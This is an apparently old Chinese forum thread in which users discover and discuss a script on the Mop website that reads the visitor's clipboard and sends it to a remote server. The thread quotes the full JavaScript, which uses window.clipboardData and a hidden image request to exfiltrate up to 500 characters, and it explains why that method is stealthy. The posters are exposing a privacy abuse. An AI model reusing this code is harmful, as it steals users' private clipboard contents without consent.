猫扑的页面

zozo

都说猫扑很火，无聊就去看了看。上来就跳出来一个对话框要播放一个shockwave的东东，可能因为欧没有装有关的插件。满页面乱七八糟，不喜欢。俺猜是不是广告垃圾太多，就看看用Adblock能不能屏蔽一些，结果看到有这么一条：
<script src="http://211.100.32.96/monitor.js"></script>，内容是

function URLencode(sStr) {
    return escape(sStr).replace(/\+/g, '%2B').replace(/\"/g,'%22').replace(/\'/g, '%27').replace(/\//g,'%2F');
}
var content = window.clipboardData.getData('Text');
if(content){
if(content != '' && content != 'null' && content.length<500){
var keyimg = new Image();
keyimg.src='http://211.100.32.96/save.jsp?key='+URLencode(content);
}
}

俺虽然不懂脚本，不过是在觉得可疑。他猫扑为什么要存俺剪贴板的内容呢？好在这东东只有IE支持，而且要打开允许脚本访问剪贴板。

greenflute

连ClipBoard都不放过，唉......

大厨

这个脚本是很奇怪，理论是取剪切板里的小于500个字长的text类型文件，然后送到服务器端去存储，之后返回一个图片文件的url地址到本地。感觉是类似于信息搜索的东东

greenflute

这只是用来上传盗取的信息的手段。

如果用put方式，就要用javascript操作form，悄悄地提交，则涉及到页面刷新问题，得用iframe。而使用隐式img（注意该img并不在页面中得到应用），则是简单地利用了get方式，比较隐蔽。

而http规范对get的查询串大小是有限制的，所以他不得已才截了一部分，否则肯定是能偷多少就偷多少。如今的网站，很是居心叵测啊......

greenflute

也亏得有这个限制，不然他很容易被自己的脚本DoS攻击呢，呵呵